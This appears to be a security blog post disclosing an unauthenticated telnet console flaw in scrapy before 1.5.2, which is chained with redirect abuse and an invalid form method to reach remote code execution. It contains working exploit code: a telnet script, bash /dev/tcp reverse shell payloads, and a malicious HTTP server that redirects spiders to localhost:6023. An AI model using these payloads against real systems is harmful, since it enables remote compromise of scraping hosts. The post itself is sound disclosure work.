“Web scraping considered dangerous”: Exploiting the telnet service in scrapy < 1.5.2
--
Disclaimer: scrapy 1.5.2 was released on January 22nd. To avoid being exploited, you must disable the telnet console (enabled by default) or upgrade to at least 1.5.2.
This year the focus of our research is security in web scraping frameworks. Why? Because it's important to us. For a little context: between 2012 and 2017 I worked at Scrapinghub, the world leader in web scraping, programming more than 500 spiders. At alertot we use web spiders to get fresh vulnerabilities from several sources, so they are a core component of our stack.
We use scrapy daily, so most of the vulnerabilities will be related to it and its ecosystem, with the aim of improving its security, but we also want to explore web scraping frameworks in other languages.
As a precedent, five years ago I discovered a nice XXE vulnerability in scrapy; you can read an updated version of that post here.
Ok, let’s go with the new material!
Just to clarify, the vulnerabilities exposed in this post affect scrapy < 1.5.2. As mentioned in the changelog of scrapy 1.6.0, scrapy 1.5.2 introduced some security features in the telnet console, specifically authentication, which protects you from the vulnerabilities I'm going to reveal.
Debugging by default
Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds, and the log shows information about enabled extensions, middlewares and other options. What has always caught my attention is the telnet service enabled by default.
[scrapy.middleware] INFO: Enabled extensions:
['scrapy.extensions.corestats.CoreStats',
'scrapy.extensions.telnet.TelnetConsole',
'scrapy.extensions.memusage.MemoryUsage',
'scrapy.extensions.logstats.LogStats']
[...]
[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
It's the telnet console running on port 6023, whose purpose is to make debugging easier. Usually telnet services are restricted to a set of functions, but this console provides a Python shell in the context of the spider, which makes it powerful for debugging and interesting if someone gets access to it.
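For instance, a session could look like this (est() and engine are real console shortcuts; the commands shown are illustrative):

$ telnet localhost 6023
>>> est()                       # print a report of the engine status
>>> engine.pause()              # pause the crawl
>>> import os; os.system('id')  # arbitrary code, run as the spider's user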
To be honest, it's not common to turn to the telnet console. I've used it to debug spiders that were either running out of memory (in restricted environments) or taking forever, totaling around 5 out of 500+ spiders.
My concern was that the console was available without any authentication, so any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept tries to exploit this local privilege escalation (LPE) bug.
An easy LPE
To demonstrate this exploitation, there are two requirements:
- The attacker has local access to the system.
- There's a spider running and exposing the telnet service. The following spider meets this requirement, making an initial request and then idling because of the download_delay setting.
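A minimal sketch of such a spider (the target URL is just an example):

import scrapy


class IdleSpider(scrapy.Spider):
    name = 'idle'
    start_urls = ['http://example.org/']
    # A long delay between requests keeps the process, and therefore
    # its telnet console, alive after the initial request
    download_delay = 3600

    def parse(self, response):
        # Schedule a second request; it will wait in the queue
        # for an hour because of download_delay
        yield scrapy.Request('http://example.org/?page=2', callback=self.parse)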
Our exploit is simple: it defines a reverse shell, connects to the telnet service, and sends a line that executes the reverse shell using Python's os.system.
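A minimal sketch of such an exploit, assuming a listener on 127.0.0.1:4444 waiting for the reverse shell:

import telnetlib

# Reverse shell command; the listener address is a placeholder
REV_SHELL = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"'

# Connect to the unauthenticated telnet console and send one Python line
tn = telnetlib.Telnet('127.0.0.1', 6023)
tn.write(("import os; os.system('%s')\n" % REV_SHELL).encode())
tn.close()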
I've created the next video to show this in action!
Now we're going to begin our journey from this local exploitation to a remote one!
Taking control of the spider's requests
Below is a spider created by the command scrapy genspider example example.org.
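The generated spider looks roughly like this (the default template at the time):

# -*- coding: utf-8 -*-
import scrapy


class ExampleSpider(scrapy.Spider):
    name = 'example'
    allowed_domains = ['example.org']
    start_urls = ['http://example.org/']

    def parse(self, response):
        pass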
It contains some class attributes, one of them being allowed_domains. According to the documentation, it is defined as:
An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won't be followed if OffsiteMiddleware is enabled.
Then, if the spider tries to make a request to example.edu, the request will be filtered and a message displayed in the log:
[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to 'example.edu': <GET http://example.edu>
However, an interesting behavior occurs when a request to a page in an allowed domain redirects to a disallowed domain: the redirected request won't be filtered and will be processed by the spider.
As reported here and in many other issues, it's a known behavior. Paul Tremberth added some context to the issue and there are some possible fixes (e.g. 1002), but nothing official.
That's unintended behavior, but under security scrutiny it's something. Imagine there's a dangerous.tld website and you want to create a spider that logs in to the user area. The server-side logic would be like this:
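A sketch of that logic, assuming a Flask application (the credentials are illustrative):

from flask import Flask, render_template, request

app = Flask(__name__)

@app.route('/')
def home():
    # login.html contains the form with action=/login
    return render_template('login.html')

@app.route('/login', methods=['POST'])
def login():
    if (request.form.get('username') == 'user'
            and request.form.get('password') == 'secret'):
        return 'welcome to the user area'
    return 'invalid credentials', 401

app.run(host='0.0.0.0', port=80)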
The template login.html used on route / displays a form with action=/login. A sample spider for the website would be:
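A sketch of the spider, using the credentials from the server above:

import scrapy


class LoginSpider(scrapy.Spider):
    name = 'login'
    allowed_domains = ['dangerous.tld']
    start_urls = ['http://dangerous.tld/']

    def parse(self, response):
        # Detect the login form in the page and fill in the credentials
        yield scrapy.FormRequest.from_response(
            response,
            formdata={'username': 'user', 'password': 'secret'},
            callback=self.after_login,
        )

    def after_login(self, response):
        if response.status == 200:
            print('authenticated')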
An overview of the steps:
- The spider sends a GET request to http://dangerous.tld/.
- Then it sends a POST request using FormRequest.from_response, which automatically detects the form in the web page and sets the form values based on the formdata dictionary.
- Finally, the spider prints that the authentication was successful.
Let’s run the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (200) <POST http://dangerous.tld/login> (referer: http://dangerous.tld/)
authenticated
[scrapy.core.engine] INFO: Closing spider (finished)
Everything is fine: the spider works and logs in successfully. But what if the website becomes a malicious actor?
By abusing the allowed_domains behavior, the malicious actor can make the spider send requests to domains of its own choosing. To demonstrate this, let's review the spider's steps. The first step creates a GET request to /, and the original code for the home endpoint is:
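In the Flask sketch from before, that endpoint simply renders the login page:

@app.route('/')
def home():
    return render_template('login.html')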
However, the website (now malicious) changes the logic to:
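A sketch of the malicious version, redirecting to a domain outside allowed_domains:

from flask import redirect

@app.route('/')
def home():
    # The spider follows this redirect even though example.org
    # is not in its allowed_domains
    return redirect('http://example.org', code=302)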
Running the spider again gives us the following output:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://example.org> from <GET http://dangerous.tld/>
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)
[scrapy.core.scraper] ERROR: Spider error processing <GET http://example.org> (referer: None)
Despite the error, the spider has indeed requested http://example.org with a GET request. Moreover, it's also possible to redirect the POST request (with its body) created in step 2, using a redirect with code 307.
Actually, it's a class of SSRF that I'd name "Spider Side Request Forgery" (everyone wants to coin new terms 😃). It's important to note some details about the environment:
- Usually a spider scrapes only one website, so it's not common for a spider to be authenticated on another website/domain.
- The spider requests the URL, and there's likely no way to get the response back (this differs from a common SSRF).
- So far, we can control only the full URL and maybe some part of the body of a POST request.
In spite of all these constraints, this kind of vulnerability, like SSRF, opens a new scope: the local network and localhost. Certainly we don't know which services live on the local network, so the key question is: what is surely running on localhost, unauthenticated, and provides code execution capabilities? The telnet service!
Let’s speak telnet language
Now, we're going to redirect the requests to localhost:6023.
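In the Flask sketch, the malicious home endpoint now becomes:

@app.route('/')
def home():
    # Point the spider at its own telnet console
    return redirect('http://localhost:6023', code=302)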
Running the spider against this malicious actor gives us a lot of errors:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://localhost:6023> from <GET http://dangerous.tld/>
[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET http://localhost:6023> (failed 1 times): [<twisted.python.failure.Failure twisted.web._newclient.ParseError: ('non-integer status code', b'\xff\xfd"\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r')>]
Unhandled Error
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.
It seems that the number of errors equals the number of lines in our GET request (including headers), so we are reaching the telnet port but not sending a valid Python line. We need more control over the data we send, since the GET line and the headers don't follow Python syntax. What about the body of the POST request that carries the login credentials?
Let's go back to the original version of the home route and try to exploit the login form logic.
Posting to telnet
The idea of using a POST request is to control the request's body, as near its start as possible, in order to build a valid Python line. The formdata argument passed to FormRequest.from_response updates the form values, adding the new values at the end of the request's body. That's great: the malicious actor could add a hidden input to the form, and it would land at the start of the request's body.
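A sketch of the tampered login.html, with the injected hidden input placed first:

<form action="/login" method="post">
  <input type="hidden" name="malicious" value="1">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>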
The request's body sent by the spider indeed starts with malicious=1; however, FormRequest.from_response URL-encodes every input, so it's not possible to build a valid Python line. After that, I tried the form's enctype, but FormRequest doesn't care about that value and just sets Content-Type: application/x-www-form-urlencoded. Game over!
Is it possible to send a POST request without an encoded body? Yes, using the plain Request class with method='POST' and setting the body directly. That's the way to send POST requests with a JSON body, but I don't consider it a realistic scenario for the malicious actor to control the body of such a request.
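For completeness, a sketch of such a request (the URL and body are illustrative):

yield scrapy.Request(
    'http://dangerous.tld/login',
    method='POST',
    headers={'Content-Type': 'application/json'},
    # The body is sent as-is, without URL-encoding
    body='{"username": "user", "password": "secret"}',
)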
Something more to try? The form method is supposed to be one of a list of valid values (GET, POST, etc.), but let's check whether scrapy actually enforces that. We're going to modify the form method to gaga.
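A hypothetical sketch of the modified form in login.html:

<form action="/login" method="gaga">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>

Let's run the spider and see the output: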
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://dangerous.tld/)
Scrapy doesn't validate that the form's method is a valid one: good news! If I create an HTTP server supporting the GAGA method, I can send a redirect to localhost:6023/payload, and this new request with the GAGA method will reach the telnet service. There's hope for us!
Creating the Python line
The idea is to create a valid Python line and then somehow neutralize the remainder of the request line. Taking into account how an HTTP request is built, and given a custom HTTP server, the line sent to the telnet console will eventually be:
GAGA /payload HTTP/1.1
As seen in the previous output, scrapy uppercased my method gaga to GAGA, so I can't inject Python code directly in the method because it would be invalid. As the method always comes first, the only option I saw was to use a method like GET =' to start a valid string assignment, then place the closing apostrophe in the URI and begin my Python code.
GET =' /';mypayload; HTTP/1.1
Here mypayload is Python code, with statements separated by semicolons. Commenting out the remainder of the line after the payload is not possible, since scrapy deletes the # character. The remainder is HTTP/1.1, so if I declare HTTP as a float, it becomes a valid division and won't raise any exception: the whole line then parses as the assignment GET = ' /', the payload statements, the assignment HTTP = 2.0, and finally the expression HTTP/1.1. The final line looks like this:
GET =' /';payload;HTTP=2.0; HTTP/1.1
Gluing everything together
The payload section is special:
- It can't contain any spaces.
- The scope is limited, i.e. the variable GET doesn't exist in the payload's scope.
- Some characters like < or > are URL-encoded.
Taking these limitations into consideration, we're going to build our payload like this:
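A sketch of how the payload can be built (the listener address is a placeholder):

import base64

# The reverse shell we want the spider's machine to execute
rev_shell = 'bash -c "bash -i >& /dev/tcp/attacker.tld/4444 0>&1"'
# Base64-encode it so the final line contains no spaces
encoded = base64.b64encode(rev_shell.encode()).decode()
# __import__ loads os and base64 without an import statement, and the
# resulting line avoids spaces and the characters < and >
payload = "__import__('os').system(__import__('base64').b64decode('%s').decode())" % encoded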
First we define our reverse shell, then we encode it in base64, and we use the magic function __import__ to load the os and base64 modules, which eventually allows us to execute our reverse shell as a command.
Now we have to create a web server capable of handling this special GET =' method. Since popular frameworks don't allow that (at least not easily), just as in the XXE exploitation I had to hack the BaseHTTPRequestHandler class from the http module to serve both the valid GET and the invalid GET =' requests. The custom web server is below:
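A sketch reconstructing that server from the description below; the attacker address is a placeholder and malicious_login.html is read from the working directory:

import base64
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_payload():
    # Same payload construction as above
    rev_shell = 'bash -c "bash -i >& /dev/tcp/attacker.tld/4444 0>&1"'
    encoded = base64.b64encode(rev_shell.encode()).decode()
    return "__import__('os').system(__import__('base64').b64decode('%s').decode())" % encoded


class MaliciousHandler(BaseHTTPRequestHandler):

    def serve_login_page(self):
        # Serve the malicious login page, whose form method is "GET ='"
        with open('malicious_login.html', 'rb') as f:
            body = f.read()
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def redirect_to_telnet(self):
        # 307 preserves the weird method, so the spider ends up sending
        # "GET =' /';<payload>;HTTP=2.0; HTTP/1.1" to the telnet console
        location = "http://localhost:6023/';%s;HTTP=2.0;" % build_payload()
        self.send_response(307)
        self.send_header('Location', location)
        self.send_header('Content-Length', '0')
        self.end_headers()

    def handle_one_request(self):
        # Replaces the parent's method: we skip parse_request(), which
        # would reject the invalid "GET ='" method, and set by hand the
        # attributes the base class normally fills in there
        try:
            self.raw_requestline = self.rfile.readline(65537)
            if not self.raw_requestline:
                self.close_connection = True
                return
            self.requestline = self.raw_requestline.decode('iso-8859-1').rstrip('\r\n')
            self.command, self.request_version = 'GET', 'HTTP/1.1'
            if 'username' in self.requestline:
                self.redirect_to_telnet()  # the form was submitted
            else:
                self.serve_login_page()
            self.wfile.flush()
        except Exception:
            self.close_connection = True


HTTPServer(('0.0.0.0', 80), MaliciousHandler).serve_forever()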
The important pieces are:
- The handler serves the malicious_login.html template when the server receives a GET request to the endpoint /. What is different in this malicious_login.html file? Our special method! (A sketch of the file follows this list.)
- We override the method handle_one_request from the parent class. It's almost the same, except that we detect that the form was sent by checking for a username string in the URI.
- The malicious logic itself: first, we set a 307 redirect code, so our weird method is kept and not changed. Then we build our payload and send a Location header to the spider, so that it hits the telnet service.
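And a sketch of malicious_login.html itself:

<!-- scrapy uppercases the method, so "GET ='" survives unchanged -->
<form action="/login" method="GET ='">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>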
Let’s see this in action!
Conclusion
After this unexpected exploitation, I'm going to create some issues on GitHub to address the problems related to unfiltered redirections and invalid form methods.
I really liked the decision taken in scrapy 1.5.2: they added user/password authentication to the telnet service, and if the password is not set, they generate a random, secure one. It's not optional security, it's security by design.
I hope you enjoyed this post and stay tuned for the following part of this research!